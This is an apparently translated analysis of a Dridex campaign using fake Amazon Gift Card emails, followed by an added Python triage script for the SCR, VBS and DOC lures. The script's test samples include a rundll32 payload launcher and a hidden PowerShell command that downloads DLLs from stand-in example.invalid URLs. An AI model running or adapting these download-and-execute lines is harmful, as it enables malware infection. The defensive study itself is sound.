
Cybercrime: Dridex spreads through fake Amazon Gift Card emails

Technical analysis by the Malware Hunter JAMESWT

Dridex hides behind a fake Amazon Gift Card to spread in a new global campaign. The link in each message leads the victim to a URL (different for every email) that downloads an SCR, a VBS or a DOC file; executing that file starts the malware infection.

Dridex leverages Amazon Gift Cards for a new global campaign. The emails carry the official company logos and invite the potential victim to download the card via a link. When opened, the link redirects the user to a URL (different for each email) that in some cases downloads an SCR file, in others a VBS script and in others a Word document. Once the download completes, the browser is automatically sent back to the Amazon page. The infection starts only if the downloaded file is executed.

In the SCR case, the file is a self-extracting archive containing scripts that execute the malicious DLL; the DLL is present either in the clear or inside a further compressed archive, sometimes protected by a password. The VBS case works the same way: when run, the script extracts from its own body a compressed archive in ZIP format with the DLL inside. The user sees nothing of this process and is led to believe that the fake Gift Card simply does not work, waiting in vain for a PDF to open. Finally, in the Word document case, once opened the document automatically downloads the DLL, picked at random from a list of URLs embedded in the document, again without the end user noticing anything.
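The following static triage routine is an added example, not part of JAMESWT's analysis, showing how a responder can apply the observations above to a downloaded lure before running it: detect a PE stub with a ZIP archive appended (the self-extracting SCR case), list the archive entries and flag DLLs and password-protected entries, and pull download URLs out of script text (the PowerShell launched by the DOC). The samples it runs on are constructed placeholders: the file names, the `example.invalid` URLs and the archive contents are invented, and the assumption that the VBS carries its ZIP as a base64 string is the example's own, since the page does not state how the script embeds the archive.

```python
"""Static triage for the three Dridex lure types described above.
Added example with constructed samples; nothing here is from the real campaign."""
import base64
import io
import re
import zipfile

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"      # legacy .doc (OLE2) container
URL_RE = re.compile(rb"https?://[^\s'\"<>)\]]+", re.IGNORECASE)
B64_RE = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")    # long base64 runs inside a script


def _is_text(data):
    """Rough check for a script file (.vbs / PowerShell): printable ASCII only."""
    sample = data[:512]
    return bool(sample) and all(b in b"\t\r\n" or 32 <= b < 127 for b in sample)


def list_archive(data):
    """Return [(name, is_encrypted)] for a ZIP, including one glued onto the end
    of a PE stub (a self-extracting .scr): zipfile finds the central directory
    from the end of the file, so prepended data is tolerated. None if no archive."""
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return None
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        # bit 0 of the general-purpose flags marks a password-protected entry
        return [(zi.filename, bool(zi.flag_bits & 0x1)) for zi in zf.infolist()]


def triage(data):
    """Classify a downloaded lure and report what a responder wants first:
    container type, embedded archive entries, DLLs (and whether they are
    password-protected), and any download URLs found in script text."""
    report = {"kind": "unknown", "entries": [], "dlls": [], "encrypted": [], "urls": []}
    if data.startswith(b"MZ"):
        report["kind"] = "pe"          # an .scr is just a renamed PE; SFX stubs are PEs
    elif data.startswith(OLE_MAGIC):
        report["kind"] = "ole-doc"
    elif data.startswith(b"PK\x03\x04"):
        report["kind"] = "zip"
    elif _is_text(data):
        report["kind"] = "script"

    candidates = [data]                # blobs that might be (or contain) an archive
    if report["kind"] == "script":
        report["urls"] = sorted({u.decode() for u in URL_RE.findall(data)})
        # Assumption for this example: the VBS carries its ZIP as a base64 string.
        for run in B64_RE.findall(data):
            try:
                candidates.append(base64.b64decode(run, validate=True))
            except ValueError:
                continue

    for blob in candidates:
        entries = list_archive(blob)
        if entries is None:
            continue
        report["entries"] = entries
        report["dlls"] = [n for n, _ in entries if n.lower().endswith(".dll")]
        report["encrypted"] = [n for n, enc in entries if enc]
        break
    return report


def build_samples():
    """Constructed stand-ins for the three lures (harmless placeholders)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("run.vbs", 'CreateObject("WScript.Shell").Run "rundll32 payload.dll,Start"')
        zf.writestr("payload.dll", b"MZ" + b"\x00" * 64)   # fake DLL, not a real PE
    archive = buf.getvalue()
    sfx_scr = b"MZ" + b"\x00" * 126 + archive              # fake PE stub + ZIP = SFX .scr
    vbs = (b'Dim blob: blob = "' + base64.b64encode(archive) + b'"\n'
           b"' decode blob to %TEMP%\\card.zip, expand it, run the DLL\n")
    doc_ps = (b"powershell -w hidden $u='http://example.invalid/a.dll',"
              b"'http://example.invalid/b.dll'; foreach($x in $u){try{"
              b"(New-Object Net.WebClient).DownloadFile($x,$env:TEMP+'\\c.dll');break}catch{}}")
    return {"scr": sfx_scr, "vbs": vbs, "doc-powershell": doc_ps}


if __name__ == "__main__":
    for name, blob in build_samples().items():
        print(name, triage(blob))
```

The archive check deliberately relies on the ZIP central directory sitting at the end of the file, which is exactly why a self-extracting SCR can be opened as an archive without touching the PE stub; a password-protected inner archive shows up in the `encrypted` list, telling the analyst to look for the password in the accompanying script rather than trying to unpack blindly.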

Two examples of the fake Gift Card email

The DOC file

The content extracted from one of the SCRs downloaded via the email link (with DLL)

The contents of the ZIP extracted from the VBS (with the DLL highlighted)

The contents of the ZIP extracted from one of the SCRs, with its script and DLL

PowerShell executed by the DOC, showing the URLs contacted to download the DLL

The URLs contacted by the DOC when run in the ANY.RUN sandbox

The C2s
